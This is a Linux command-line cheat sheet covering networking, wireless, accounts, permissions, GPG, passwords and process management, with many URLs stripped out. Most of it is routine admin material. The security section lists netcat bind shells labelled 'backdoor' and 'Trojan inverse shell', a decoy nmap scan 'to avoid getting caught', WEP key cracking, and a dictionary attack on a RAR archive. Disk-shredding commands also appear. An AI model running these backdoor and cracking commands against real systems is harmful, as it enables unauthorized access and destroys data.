Create a persistent connection to a machine

 ssh -MNf <user>@<host>

directly ssh to host B that is only accessible through host A

 ssh -t hostA ssh hostB

Show all programs on UDP and TCP ports with timer information

 netstat -putona

ping the host


mtr, better than traceroute and ping combined


Lists all listening ports together with the PID of the associated process

 netstat -tlnp

finger the user

 finger bradley    prints: Login: bradley  Name: Bradley J Milton ...

output the users who are currently logged in to the system


find the IP address of the host



find the host name that corresponds to the IP address

 dig -x

output the name of the Whois Server for


view the domain record for, using the

 whois -h

send the message 'get up!' to the terminal where user 'sleepy' is logged in

 write sleepy get up

output the contents of '/etc/motd' to all logged-in terminals,

 wall /etc/motd

output the text 'hello?' to all logged-in terminals

 wall hello?

disallow messages to be written to your terminal

 mesg n

output the current access state of your terminal


request a chat with the user


view network traffic with protocols: wireshark

find which tcp ports are currently in use

 lsof | grep TCP   lsof lists all open unix 'files' including pipes

lots of detailed information

 lshw -C Network

restart the gnome graphical network manager applet

 sudo restart network-manager

Analysing The Network ‹↑›

make an alias (command) to ping a yahoo server without any dns

 alias testnet='ping'
this can determine if the problem is dns or tcpip

Router discovery

 sudo arp-scan --interface=eth0 --localnet

Show all machines on the network

 nmap 192.168.0-1.0-255 -sP

Localize provenance of current established connections

 for i in $(netstat --inet -n|grep ESTA|awk '{print $5}'|cut -d: -f1);do geoiplookup $i;done

List the number and type of active network connections

 netstat -ant | awk '{print $NF}' | grep -v '[a-z]' | sort | uniq -c
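
The 'sort | uniq -c | sort' idiom above does the counting; here it is applied to a few made-up connection states instead of live netstat output:

```shell
# count how many times each state occurs, most frequent first
printf 'ESTABLISHED\nLISTEN\nESTABLISHED\nTIME_WAIT\n' | sort | uniq -c | sort -rn
# the first line printed is "2 ESTABLISHED" (with leading spaces from uniq -c)
```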

Sniffing Network Traffic ‹↑›

Remotely sniff traffic and pass to snort

 ssh root@pyramid \ "tcpdump -nn -i eth1 -w -" | snort -c /etc/snort/snort.conf -r -

Tcpip Ports ‹↑›

List all TCP opened ports on localhost in LISTEN mode

 netstat -nptl

which program does this port belong to?

 lsof -i tcp:80

list all opened ports on host

 nmap -p 1-65535 --open localhost

list all opened ports on host

 sudo lsof -P -i -n -sTCP:LISTEN

Show apps that use internet connection at the moment.

 netstat -lantp | grep -i establ | awk -F/ '{print $2}' | sort | uniq

Port Knocking!

 knock <host> 3000 4000 5000 && ssh -p <port> user@host && knock <host> 5000 4000 3000

Show apps that use internet connection at the moment.

 ss -p

netcat as a portscanner

 nc -v -n -z -w 1 22-1000

Ip Addresses ‹↑›

Get My Public IP Address

 wget -qO - | egrep -m1 -o '[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}'

What is my ip?

 curl -s | grep -Eo '[0-9\.]+'

What is my ip? (hardened)

 curl --connect-timeout 3

geoip information

 GeoipLookUp(){ curl -A "Mozilla/5.0" -s "$1" | grep "^IP.*$1" | html2text; }

Get My Public IP Address

 curl -s

display ip address

 curl -s | grep '<title>' | sed -e 's/<[^>]*>//g'

Filter IPs out of files

 egrep -o '[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}' file.txt
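
For example, on a small sample file made up for the occasion:

```shell
# pull the IPv4 addresses out of some sample text
printf 'gateway 10.0.0.1\nserver 192.168.1.20 up\n' > /tmp/ips-demo.txt
egrep -o '[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}' /tmp/ips-demo.txt
# prints 10.0.0.1 and 192.168.1.20, one per line
rm /tmp/ips-demo.txt
```

note that the pattern also matches strings like 999.999.999.999; it filters candidates, it does not validate them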

Dhcp Dynamic Host Control Protocol ‹↑›

expect related tools
expectk - a graphical front end
autoexpect - create a script from an interactive session

get IPs with a DHCP lease

 egrep "^lease" /var/lib/dhcp/db/dhcpd.leases |awk '{ print $2 }'

randomize hostname and mac address, and force a dhcp renew

 dhclient -r && rm -f /var/lib/dhcp3/dhclient* && sed "s=$(hostname)=REPLACEME=g" -i /etc/hosts && hostname "$(echo $RANDOM | md5sum | cut -c 1-7 | tr a-z A-Z)" && sed "s=REPLACEME=$(hostname)=g" -i /etc/hosts && macchanger -e eth0 && dhclient

Ping ‹↑›

ping a range of IP addresses

 nmap -sP

ping a host until it responds, then play a sound, then exit

dhclient - sets up a dhcp client from the command line

Ifconfig ‹↑›

how to use ifconfig
set up an ethernet network device, specifying an ip address
  ifconfig eth0 <ip-address> netmask <netmask> broadcast <broadcast> up

Proxy Servers ‹↑›

Create a single-use TCP proxy with debug output to stderr

 socat -v tcp4-l:<port> tcp4:<host>:<port>

Create a single-use TCP (or UDP) proxy

 nc -l -p 2000 -c "nc <host> 3000"

Mac Addresses ‹↑›

A 'mac' address is a unique number associated with a given network interface on a computer. A network interface is a wireless card, ethernet card, modem, etc. No two network devices in the world share the same mac address, or at least none should.

how to change ('spoof') the mac address for a given network device on the local computer.
www: deb:
macchanger a package to change the mac address for a given network interface. this may not work with all wireless cards.
Determine MAC address of remote host when you know its IP address

Insert a colon between every two digits

 sed 's/\(..\)/\1:/g;s/:$//' mac_address_list
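
For example, applied to a single bare mac address on standard input instead of a file:

```shell
# insert a colon after every two characters, then strip the trailing colon
echo '0080c8f8be51' | sed 's/\(..\)/\1:/g;s/:$//'
# prints 00:80:c8:f8:be:51
```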

find the mac address of all active network interfaces (wireless, ethernet ...)

 ifconfig -a | grep HWaddr

show the mac address to ip table for the local computer


Resets your MAC to a random MAC address to make you harder to track

 ran=$(head /dev/urandom | md5sum); MAC=00:07:${ran:0:2}:${ran:3:2}:${ran:5:2}:${ran:7:2}; sudo ifconfig wlan0 down hw ether $MAC; sudo ifconfig wlan0 up; echo ifconfig wlan0:0

change or 'spoof' the mac address of the ethernet network device

    ifconfig eth0 down
    ifconfig eth0 hw ether 00:80:48:BA:d1:30
    ifconfig eth0 up
    ifconfig eth0 | grep HWaddr

change the mac address for the wireless card 'wlan0' to the specified

 macchanger --mac 00:00:13:37:00:00 wlan0
this only works if the wireless card driver supports the operation

Monitoring Network Bandwidth ‹↑›

watch data usage on eth0

 watch ifconfig eth0

monitor bandwidth and data transfer

 iptables, bmon, vnstat, ntop, bwm-ng, iftop, iptraf, darkstat, mrtg ...

output bmon data as html

 bmon -O html:path=/home/var/www/html/data/bmon

create a new database with data about the eth0 (ethernet interface)

 vnstat -u -i eth0

store data about the 'ppp0' interface (a modem, or wireless usb dongle) etc

 sudo vnstat -u -i ppp0

show an ascii graph of data transfer by the hour

 vnstat -h

look for the number of RX bytes and TX bytes of the active interface


Network Configuration ‹↑›

udp uses no acknowledgement and is used by tftp (trivial file transfer protocol), snmp (simple network management protocol), dhcp and dns. Like tcp, udp uses port numbers and runs on top of ip; port numbers are its only addition to ip.

tcpdump, ethereal to see network traffic

monitor the ethernet network traffic

 while :; do netstat -in | grep ath0 ; sleep 1 ; done

show network interfaces

 ip link show
 netstat -in

list the routing table

 ip route show

configure a network connection via dhcp


Wireless Networks ‹↑›

ping a host until it responds, then beep four times, then exit

 beepwhenup () { echo 'Enter host you want to ping:'; read PHOST; if [[ "$PHOST" == "" ]]; then exit; fi; while true; do ping -c1 -W2 $PHOST 2>&1 >/dev/null; if [[ "$?" == "0" ]]; then for j in $(seq 1 4); do beep; done; ping -c1 $PHOST; break; fi; done; }

connect to a network called 'beach cafe'

 iwconfig eth0 essid "beach cafe"

connect to the 'uconnect' network

 iwconfig eth0 essid uconnect

connect with a wep key

 iwconfig eth0 essid uconnect key s:Password
 iwconfig eth0 essid uconnect key 1fa24 hex notation

get a dhcp ip address from the network

 dhclient   run this after 'iwconfig'

show the mac address of the access point

 iwgetid -ap

show available encryption algorithms

 iwlist encryption

show transmitter power

 iwlist power

show the status of the wireless interface eth1

 iwconfig eth1

If an ESSID:"name" appears then the interface is connected

show information about available wireless networks in range

 iwlist scan

view all networks reachable from the ra0 interface (wireless card)

 iwlist ra0 scan

manipulate driver-specific ('private') wireless parameters (very mysterious)

 iwpriv

Wireless Security ‹↑›

The official site
iwlist - show available wlans
iwgetid - shows interfaces
iwspy - show other lan clients
iwevent - monitor wlans
dhclient - set up dhcp clients

sniff wireless traffic using the 'ra0' interface

 sudo airodump-ng ra0

Put the wireless card into monitor mode

 airmon-ng start <interface> <channel>

capture wireless packets on channel 11 from the given mac address

 airodump-ng -c 11 --bssid 00:01:02:03:04:05 -w dump rausb0
the captured packets get written to a file prefixed 'dump'; more than 40000 packets should be captured in order to crack the key

attempt to crack the wep key using captured data in 'dump-01.cap'

 aircrack-ng -b 00:01:02:03:04:05 dump-01.cap

use several captured data packet files using a wildcard

 aircrack-ng -b 00:01:02:03:04:05 dump*.cap

test if the 'ra0' wireless card supports 'injection'

 aireplay-ng -9 ra0      or run with sudo
injection is required for speeding up wireless attacks

User And Group Accounts ‹↑›

Unix-style operating systems use user and group accounts to control access to files, folders and other resources. The super-user on a Unix-style operating system is called the 'root' user.

Users ‹↑›

find out who you logged onto the machine as

 who am i

find out what users are logged onto the system


display which user is running a process from a given port name

 fuser -nu tcp 3691

list what rights you will have after a 'sudo' command

 sudo -l

quickly add user accounts to the system and force a password

 for name in larry moe schemp; do useradd $name; echo 'password' | passwd --stdin $name; chage -d 0 $name; done

Add existing user to a group

 usermod -a -G groupname username

list files not owned by any user or group

 find / -nouser -o -nogroup -print

list your group memberships

 groups
prints something like 'steward galley crew'

list the group memberships of user blackbeard

 groups blackbeard

output a list of the members of the galley group

 members galley

change the group ownership of file 'cruise' to bridge

 chgrp bridge cruise

give group ownership of the 'maps' directory and all the files it contains to the bridge group

 chgrp -R bridge maps

write-protect the file 'cruise' so that no other users can change it

 chmod go-w cruise

make the file 'cruise' private from all users but yourself

 chmod go= cruise

make the file 'cruise' both world readable and world writable

 chmod a+rw cruise

give execute permission to all users for the file 'myscript'

 chmod a+x myscript

Get a quick list of all user and group owners of files and dirs

 find -printf '%u %g\n' | sort | uniq


www: deb:
acct show information about users
www: deb:
quota allows the administrator to place disk quotas on users account
Remove executable bit from all files in the current directory
 find . ! -type d -exec chmod -x {} \;

Switch to a user with "nologin" shell

 sudo -u username bash

Recursive chmod all files and directories within the current folder

 chmod -R 774 .

Create a listing of all possible permissions and their octal

 touch /tmp/$$;for N in `seq -w 0 7777|grep -v [89]`; do chmod $N /tmp/$$; P=`ls -l /tmp/$$ | awk '{print $1}'`; echo $N $P; done;rm /tmp/$$
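
A single instance of the octal-to-symbolic mapping that the loop prints (on systems with SELinux or ACLs, 'ls -l' may append a '.' or '+' to the mode string):

```shell
# mode 754 = rwx for the owner, r-x for the group, r-- for everyone else
touch /tmp/permdemo.txt
chmod 754 /tmp/permdemo.txt
ls -l /tmp/permdemo.txt | awk '{print $1}'   # prints -rwxr-xr--
rm /tmp/permdemo.txt
```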

show all user accounts on the local computer

 cat /etc/passwd
 cat /etc/passwd | grep /home  shows only non-application users
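
Each line of /etc/passwd holds seven colon-separated fields: name, password placeholder, uid, gid, comment, home directory and shell. 'cut' can pick fields out of a line (the 'bob' account here is invented):

```shell
# show the login name, home directory and shell (fields 1, 6 and 7)
echo 'bob:x:1001:1001:Bob Smith:/home/bob:/bin/bash' | cut -d: -f1,6,7
# prints bob:/home/bob:/bin/bash
```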

List all groups and the user names that were in each group

 for u in `cut -f1 -d: /etc/passwd`; do echo -n $u:; groups $u; done | sort

add a new user account


add a new group account


change ownership of a file to another user


change the group ownership of a file or files


print what groups a user belongs to


change the password for the 'mjb' user account

 passwd mjb

find all files on the computer owned by the 'bob' user

 find / -user bob -ls

File Permissions ‹↑›

give any files that don't already have it group read permission

 find . -type f ! -perm /g=r -exec chmod g+r {} +

remove executable bit from all files in the current directory

 chmod -R -x+X *

recursively reset file or folder permissions

 find public_html/stuff -type d -exec chmod 755 {} + -or -type f -exec chmod 644 {} +

Change the ownership of all files owned by one user.

 find /home -uid 1056 -exec chown 2056 {} \;

create directory and set owner/group/mode in one shot

 install -o user -g group -m 0700 -d /path/to/newdir

Security ‹↑›

Unix security checker


Net Security ‹↑›

find running binary executables that were installed irregularly

 cat /var/lib/dpkg/info/*.list > /tmp/listin ; ls /proc/*/exe |xargs -l readlink | grep -xvFf /tmp/listin; rm /tmp/listin

Scan Network for Rogue APs.

 nmap -A -p1-85,113,443,8080-8100 -T4 --min-hostgroup 50 --max-rtt-timeout 2000 --initial-rtt-timeout 300 --max-retries 3 --host-timeout 20m --max-scan-delay 1000 -oA wapscan

Create a backdoor on a machine to allow remote connection to bash

 nc -vv -l -p 1234 -e /bin/bash

Find brute force attempts on SSHd

 cat /var/log/secure | grep sshd | grep Failed | sed 's/invalid//' | sed 's/user//' | awk '{print $11}' | sort | uniq -c | sort -n

Use a decoy while scanning ports to avoid getting caught by the sysadmin

 sudo nmap -sS -D

Conficker Detection with NMAP

 nmap -PN -d -p445 --script=smb-check-vulns --script-args=safe=1 IP-RANGES

Find files with root setuids settings

 sudo find / -user root -perm -4000 -print

Trojan inverse shell

 nc -l -p 2000 -e /bin/bash

Check for login failures and summarize

 zgrep "Failed password" /var/log/auth.log* | awk '{print $9}' | sort | uniq -c | sort -nr | less

Block known dirty hosts from reaching your machine

 wget -qO -|awk '!/#|[a-z]/&&/./{print "iptables -A INPUT -s "$1" -j DROP"}'

retrieve top ip threats from

 curl -s|grep "ipinfo.html"|awk -F"ip="

Locking and unlocking files and mailboxes


Add a line for your username in the /etc/sudoers file

 echo 'loginname ALL=(ALL) ALL' >> /etc/sudoers
editing /etc/sudoers with 'visudo' is safer, since it checks the syntax

Shredding ‹↑›

Shredding data means deleting it in a way that makes it unrecoverable, by analogy with shredding a paper document.

Securely destroy data (including whole hard disks)

 shred targetfile

securely overwrite a file with random junk, zero it, and then delete it

 shred -vzu /tmp/junk-file-to-be-shredded

Shred a complete disk, overwriting its contents 10 times

 sudo shred -zn10 /dev/sda

Securely destroy data on given device

 # for i in $(seq 1 25); do dd if=/dev/urandom of=<your disk> bs=1M ; done

Firewalls ‹↑›

Redirect incoming traffic to SSH, from a port of your choosing

 iptables -t nat -A PREROUTING -p tcp --dport [port of your choosing] -j REDIRECT --to-ports 22

Tired of switching between proxy and no proxy? here's the solution

 iptables -t nat -A OUTPUT -d ! -p tcp --dport 80 -j DNAT --to-destination

Save iptables firewall info

 sudo iptables-save > /etc/iptables.up.rules

Remove an IP address ban that has been errantly blacklisted by denyhosts

 denyhosts-remove $IP_ADDRESS

watch iptables counters

 watch 'iptables -vL'

Block all IP addresses and domains that have attempted brute force logins

 (bzcat BZIP2_FILES && cat TEXT_FILES) | grep -E "Invalid user|PAM" | grep -o -E "from .+" | awk '{print $2}' | sort | uniq >> /etc/hosts.deny

Privacy ‹↑›

www: bleachbit
eliminate all sorts of caches, for the sake of privacy
www: gpa
a graphical user interface to 'gpg'
www: seahorse
the gnome graphical front-end for gpg
www: kgpg
the kde front end
www: firegpg
use gpg with webmail in firefox
www: psi
use gpg with jabber xmpp im clients
www: enigmail
integrate gpg with thunderbird email client
wireless security auditing programs
aircrack-ng obtain wireless network passwords
kismet see wireless networks in range and clients

see if gpg is installed

 which gpg
 which gpg2    the newer version

make a public key for somebody to send you stuff

 gpg --gen-key
 input name and email address

The new key gets put on a key-ring

see what keys are on your keyring (like the one you just made)

 gpg --list-keys

show the fingerprint for a key

 gpg --fingerprint

'fingerprints' are used to make sure that the public key for somebody really is from them.

export the key with the given id to a file 'key.asc' and send to people

 gpg --armor --export 86d68542 --output key.asc

send the public key with given id to the mit 'public key server'

 gpg --keyserver=x-hkp:// --send-keys 86d68542

or use the web interface of a public key server to submit a key: paste in the '.asc' file created before with --armor

import a key file containing somebody's public key

 gpg --import key.asc

Then you use this key to encrypt things which you are going to send to them.

search the 'mit' public key server for a public key belonging to Ben stewart

 gpg --keyserver=x-hkp:// --search-keys Ben Stewart

Then enter a number corresponding to the desired user to enter that key into your keyring

Keyring ‹↑›

private keys normally stored in

 ~/.gnupg/secring.gpg

public keys stored in

 ~/.gnupg/pubring.gpg
Signing Keys ‹↑›

In order to verify that a public key really is from somebody, signing is used. The more genuine people sign a key as authentic, the more likely it is to be authentic.

sign the public key for 'bob'

 gpg --edit-key
then type 'sign' at the gpg prompt

Then send this signed key to the public key server with the same command as before.

list who has signed the public key for 'bob stewart'

 gpg --list-sigs

Encrypting ‹↑›

encrypt 'file.pdf' for sending to user (using his public key)

 gpg --encrypt --recipient '' file.pdf

creates a file 'file.pdf.gpg' which is encrypted

encrypt a file for yourself (just use your own public key to encrypt it)

 gpg --encrypt --recipient '' file.pdf

Decrypting ‹↑›

decrypt a file sent to you (uses your private key)

 gpg --output f.txt --decrypt f.txt.asc

this prompts for your keyring passphrase

create a file 'leaks.txt.asc' which is signed as being from you but not encrypted

 gpg --clearsign leaks.txt

verify that a 'signed' file is from the person who it says it is

 gpg --verify leaks.txt

create a revocation certificate which is useful if you forget a password

 gpg --gen-revoke 8657698

Send the revocation certificate to the public key server if you forget a password for a key

Encryption ‹↑›

the 2 keys
your public - other people use it to send you stuff
your private - decrypt things sent to you
other persons public - you use it to send things to them
other person private - they use it to decrypt things sent to them

Quickly generate an MD5 hash for a text string using OpenSSL

 echo -n 'text to be encrypted' | openssl md5

gpg decrypt several files

 gpg --allow-multiple-messages --decrypt-files *

Safely store your gpg key passphrase.

 pwsafe -qa "gpg keys"."$(finger `whoami` | grep Name | awk '{ print $4" "$5 }')"

quickly encrypt a file with gnupg and email it with mailx

 cat file.txt | gpg2 --encrypt --armor --recipient "Disposable Key" | mailx -s "Email Subject"

Mount a truecrypt drive from a file from the command line

 su -c "truecrypt --non-interactive truecrypt-file cryptshare -p PASSWORD"

Create/open/use encrypted directory

 encfs ~/.crypt ~/crypt

Encrypted archive with openssl and tar

 tar c folder_to_encrypt | openssl enc -aes-256-cbc -e > secret.tar.enc
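
A round trip on a small file shows the matching decryption step; '-pass pass:demo' is used here only to keep the example non-interactive (letting openssl prompt for the passphrase is safer):

```shell
# encrypt and then decrypt a small file with aes-256-cbc
echo 'top secret' > /tmp/plain-demo.txt
openssl enc -aes-256-cbc -pass pass:demo -in /tmp/plain-demo.txt -out /tmp/plain-demo.enc
openssl enc -aes-256-cbc -d -pass pass:demo -in /tmp/plain-demo.enc
# prints: top secret
rm /tmp/plain-demo.txt /tmp/plain-demo.enc
```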

Encrypted archive with openssl and tar

 openssl des3 -salt -in unencrypted-data.tar -out encrypted-data.tar.des3

rot13 simple substitution cipher via command line

 alias rot13='perl -pe "y/A-Za-z/N-ZA-Mn-za-m/;"'
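
The same substitution can be done with 'tr'; since rot13 is its own inverse, applying it twice returns the original text:

```shell
# rot13 with tr instead of perl
rot13() { tr 'A-Za-z' 'N-ZA-Mn-za-m'; }
echo 'Hello' | rot13            # prints Uryyb
echo 'Hello' | rot13 | rot13    # prints Hello
```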

Cracking a password protected .rar file

 for i in $(cat dict.txt);do unrar e -p$i protected.rar; if [ $? = 0 ];then echo "Passwd Found: $i";break;fi;done

MD5 SUMS ....

Create md5sum of files under the current dir excluding some

 find . -type d \( -name DIR1 -o -name DIR2 \) -prune -o -type f -print0 | xargs -r0 md5sum

recursively md5 all files in a tree

 find ./backup -type f -print0 | xargs -0 md5sum > /checksums_backup.md5

Verify MD5SUMS but only print failures

 md5sum --check MD5SUMS | grep -v ": OK"

Gpg ‹↑›

gpg is the GNU Privacy Guard, the GNU project's implementation of pgp ('pretty good privacy').

Receive, sign and send GPG key id

 caff <keyid>

import gpg key from the web

 curl -s | gpg --import

gpg decrypt a file

 gpg --output foo.txt --decrypt foo.txt.pgp

add a gpg key to the aptitude package manager on a ubuntu system

 wget -q http://xyz.gpg -O- | sudo apt-key add -

encrypt the file 'log.txt'

 gpg -c log.txt

gpg encrypt a file

 gpg --encrypt --recipient 'Foo Bar' foo.txt

decrypt file

 gpg log.txt.gpg

encrypt all files in a specific directory

 for a in path/* ; do ccencrypt -K <password> "$a"; done

Passwords ‹↑›

Use md5 to generate a pretty hard to crack password

 echo "A great password" | md5sum

Generate a random password 30 characters long

 strings /dev/urandom | grep -o '[[:alnum:]]' | head -n 30 | tr -d '\n'; echo

hide a password while reading it from the keyboard

 save_state=$(stty -g);echo -n "Password: ";stty -echo;read password;stty "$save_state";echo "";echo "You inserted $password as password"

generate a unique and secure password for every website that you use

 sitepass() { echo -n "$@" | md5sum | sha1sum | sha224sum | sha256sum | sha384sum | sha512sum | gzip - | strings -n 1 | tr -d "[:space:]" | tr -s '[:print:]' | tr '!-~' 'P-~!-O' | rev | cut -b 2-11; history -d $(($HISTCMD-1)); }

Recovering Passwords ‹↑›

password recovery on debian

 init=/bin/bash; mount -o remount,rw /

Generating Passwords ‹↑›

generate random password

 pwgen -Bs 10 1

Password Generation

 pwgen --alt-phonics --capitalize 9 10

a homemade password generator

 genpass(){local i x y z h;h=${1:-8};x=({a..z} {A..Z} {0..9});for ((i=0;i<$h;i++));do y=${x[$((RANDOM%${#x[@]}))]};z=$z$y;done;echo $z ;}

Generate Random Passwords

 dd if=/dev/urandom count=200 bs=1 2>/dev/null | tr "\n" " " | sed 's/[^a-zA-Z0-9]//g' | cut -c-16

generate random password

 openssl rand -base64 6

Generate 10 pronunciable passwords

 apg -a 0 -n 10

password generator

 genpass() { local h x y;h=${1:-8};x=( {a..z} {A..Z} {0..9} );y=$(echo ${x[@]} | tr ' ' '\n' | shuf -n$h | xargs);echo -e "${y// /}"; }

generate random password

 tr -dc 'a-zA-Z0-9' < /dev/urandom | head -c10
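
A sketch wrapping the same recipe in a small function that takes an optional length, defaulting to 10 (the function name 'randpw' is made up):

```shell
# random alphanumeric password of a chosen length
randpw() { tr -dc 'a-zA-Z0-9' < /dev/urandom | head -c "${1:-10}"; echo; }
randpw 16    # prints 16 random alphanumeric characters
```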

Creates a random password from /dev/urandom [0-9A-za-z]

 head -c $((<pw-length>-2)) /dev/urandom | uuencode -m - | sed -e '1d' -e '3d' | sed -e 's/=.*$//g'

Changing Passwords ‹↑›

force change password for all users

 for i in `cat /etc/passwd | awk -F : '{ print $1 }';`; do passwd -e $i; done

Services ‹↑›

'services' are a special type of process which are generally always running and are often started when the computer starts up. Examples of services are a web-server, an ftp server ...

www: debian:
sysvconfig allows a user to use the redhat-style 'service' command
show what services are available on the computer
 ls /etc/init.d

start or stop a service on a debian-style linux

 sudo /etc/init.d/servicename start|stop

restart the 'sshd' (secure shell) service

 sudo /etc/init.d/sshd restart

another way

 update-rc.d ... invoke-rc.d

stop the 'apache' service (with the sysvconfig package, or on redhat style)

 sudo service apache stop

other tools: rcconf, update-rc.d

Starting Services At Computer Start Up ‹↑›

Linux has a concept of 'run-levels', which are stages the computer passes through as it boots up and shuts down. The higher the level, the more 'booted-up' the system is. A service can be configured to start at any particular run-level.

configure apache to start up when the computer starts

 update-rc.d apache2 defaults   this is debian-specific
 update-rc.d apache2 start 20 2 3 4 5 . stop 80 0 1 6 .  the same

disable the apache webserver from starting when the computer starts

 update-rc.d -f apache2 remove

create automatic startup links manually (this is the older way)

 cd /etc/rc5.d/
 ln -s /etc/init.d/apache2 S20apache2
# when the computer enters run-level 5 (rc5.d) it will start (S) the
# 'apache2' service with a priority of '20', that is, before all other
# services which have a priority number greater than 20

Pipes ‹↑›

The unix pipeline is possibly the most important concept in the unix world

cat large file to clipboard with speed-o-meter

 pv large.xml | xclip

Processes ‹↑›

At the heart of a unix-type operating system is the concept of the 'process'. Processes allow the computer to do more than one thing at a time.

Processes are essentially running programs (applications, software). Some applications, when they run, are visible because they use a 'window' or display information on the command line. Other processes are 'invisible': they are running, but you as the user see no visible activity.

Close shell keeping all subprocess running

 disown -a && exit

encryption tools
password gorilla - a graphical cross-platform encryption tool
gpg -
gpg2 -
cccrypt -
mcrypt - a replacement for crypt (its own documentation advises against using it)

Viewing Processes ‹↑›

It may be possible to view processes also with 'zenity' etc.

view processes (jobs) started from the current shell

 jobs
show information for all processes

 ps -e

display all your processes which have 'eave' in their name

 leave +30; ps | grep -v grep | grep -i eave

make a bash function 'pss' to display processes with 'ave' in the name

 pss(){ ps | grep -v grep | grep -i "$1"; }; pss ave

view all processes in real time

 top
show verbose information for all processes, not just for the current user

 ps -ef
 ps aux  more or less the same

Show a 4-way scrollable process tree with full details.

 ps awwfux | less -S

Alias for displaying a process tree nicely

 alias pst='pstree -Alpha'; pst

show all processes in a 'tree' format (parent and child processes linked)

 pstree
Displays process tree of all running processes

 pstree -Gap

Check if a process is running

 kill -0 <process-id>

order processes by cpu usage

 ps -e -o pcpu,cpu,nice,state,cputime,args --sort pcpu | sed "/^ 0.0 /d"

Show the 20 most CPU/Memory hungry processes

 ps aux | sort -nk3 | tail -20   sorts on the %CPU column

show process numbers for the root user

 pgrep -u root

show running processes ordered by the amount of CPU usage

 ps -eo pcpu,pid,args | sort -n

show all processes using a directory/file/etc

 lsof | grep /Volumes/Lexar

sort all running processes by their memory & cpu usage

 ps aux --sort=%mem,%cpu

Managing Processes ‹↑›

ionice limits process I/O, to keep it from swamping the system

 ionice -c3 find /

Restart command if it dies.

 ps -C program_name || { program_name & }

Analysing Processes ‹↑›

Determine the exact memory usage of a certain PID

 pmap -d [pid]

count processes with status "D" (uninterruptible sleep)

 top -b -n 1 | awk '{if (NR <=7) print; else if ($8 == "D") {print; count++} } END {print "Total status D: "count}'

process tools
ps - the basic tool
top - views processes in real time
lsof - displays open files
pstree - a hierarchical tree display
pmap -
pgrep -

Find the processes that are on the runqueue. Processes with a

 ps -eo stat,pid,user,command | egrep "^STAT|^D|^R"

Pulls total current memory usage, including SWAP being used, by all processes

 ps aux | awk '{sum+=$6} END {print sum/1024}'

find out current working directory of a process

 echo COMMAND | xargs -ixxx ps -C xxx -o pid= | xargs -ixxx ls -l /proc/xxx/cwd

Show top running processes by the number of open filehandles they

 lsof | awk '{print $1}' | sort | uniq -c | sort -rn | head

Return threads count of a process

 ps -o thcount -p <process id>

List all process running on port 80

 sudo lsof -i :80

catch a process from a user and strace it.

 x=1; while [ $x = 1 ]; do process=`pgrep -u username`; if [ $process ]; then x=0; fi; done; strace -vvtf -s 256 -p $process

Killing Processes ‹↑›

In order to stop a running program (which doesn't have a window) it is necessary to 'kill' (or stop) the associated process. To do this, it may first be necessary to find out the process identification number ('pid') of the running application.

start and then kill the 'leave' process using its exact name

 leave +20; killall -9 leave; ps

The command above will permanently stop ('kill') all processes which are named exactly 'leave', that is, all processes which were started by the 'leave' reminder program.

make a bash function 'psk' to kill processes with 'ave' in their name

 psk(){ ps | grep -v grep | grep -i "$1" | awk '{print $1;}' | xargs kill -9; }; psk ave

another way to kill a process using its name

 leave +20; pkill leave; ps

Kill a background job

 kill %1

Kills a process that is locking the file 'eg.txt'

 fuser -k eg.txt

find out the 'pid' number of a process associated with 'leave'

 leave +20; ps aux | grep leave

show the process id of a running program

 ls | at 1156; pidof at ; ps

you have to know the exact name of the program

Kill all processes that don't belong to root/force logoff

 for i in $(pgrep -v -u root);do kill -9 $i;done

Kill all processes belonging to a user

 ps -ef | grep $USERNAME | awk {'print $2'} | xargs kill [-9]

Kill all processes belonging to a single user.

 kill -9 `ps -u <username> -o "pid="`

Kill most recently created process with the name 'firefox'

 pkill -n firefox

kill all processes using a directory/file/etc

 lsof | grep /Volumes/Lexar | awk '{print $2}' | xargs kill

stop a program or process with 'sshd' in its name

 kill $(ps -ef | awk '/sshd/ { print $2 }')
 kill $(ps -ef | grep sshd | awk '{ print $2 }')   the same

trace the system calls made by a process (and its children)

 strace -f -s 512 -v ls -l

Zombie Processes ‹↑›

display all 'zombie' processes

 ps aux | awk '{ print $8 " " $2 " " $11}' | grep -w Z

Get a regular updated list of zombies

 watch "ps auxw | grep [d]efunct"

Get a regular updated list of zombies

 watch "ps auxw | grep 'defunct' | grep -v 'grep' | grep -v 'watch'"

Environment Configurations ‹↑›

show the values of the environment variables


Executes a command changing an environment variable 'var'

 var="value" command

For example ...

show what time and date it is in new york

 TZ=America/New_York date
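
The assignment applies only to that one command; the shell's own environment is untouched:

```shell
# run a single command with a temporary environment variable
TZ=UTC date +%Z    # prints UTC
echo "TZ is still '$TZ'"
```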

Aliases ‹↑›

put aliases in the ~/.bashrc file to save them

 alias dir='ls -la | less'

Quickly make an alias permanent

 PERMA () { echo "$@" >> ~/.bashrc; }

an alias cannot really take arguments; anything typed after the alias is simply appended to the expansion (use a shell function when real parameters are needed)

 alias say='echo $1'   but alias say='echo $1; echo 1' doesn't work...

reload the .bashrc file to make a new alias take effect

 source ~/.bashrc

add a folder to the executable path (put in ~/.bash_profile file to save it)

 export PATH=/path/to/folder:"${PATH}"
programs in this folder can then be executed with 'programname'
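
A sketch with a throwaway directory and script name (both invented for the example):

```shell
# create a private bin directory, add it to PATH, run a script by name
mkdir -p /tmp/demo-bin
printf '#!/bin/sh\necho hello from demo\n' > /tmp/demo-bin/demo-hello
chmod +x /tmp/demo-bin/demo-hello
export PATH=/tmp/demo-bin:"$PATH"
demo-hello    # prints: hello from demo
```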

make all terminals write to the same history file

 shopt -s histappend       put in .bashrc, on single user systems

enable changing to a folder by typing only the folder name (not path)

 export CDPATH='.:~:/some/folder:/path/to/folder'
place this in .bashrc with commonly used folders
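
A quick sketch of the effect (the directory names are made up):

```shell
# with the parent directory in CDPATH, 'cd website' works from anywhere;
# the shell prints the directory it actually changed to
mkdir -p /tmp/demo/projects/website
export CDPATH=.:/tmp/demo/projects
cd website
pwd
```
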

Timing Performance ‹↑›

time how long a "grep" command takes to execute

 time grep -rl big *

time the execution time of 2 commands at the same time

 time { find / -name '*what*'; locate '*.cc' ; }

Scheduling ‹↑›

list processes in uninterruptible sleep ('D' state), with a count

 top -b -n 1 | awk '{if (NR <=7) print; else if ($8 == "D") {print; count++} } END {print "Total status D: "count}'

At ‹↑›

retrieve the page '' at 12:00 o'clock

 echo 'wget' | at 12:00

Schedule a script or command to run in 2 hours

 ( ( sleep 2h; your-command your-args ) & )

Execute a command at a given time

 echo "ls -l" | at midnight
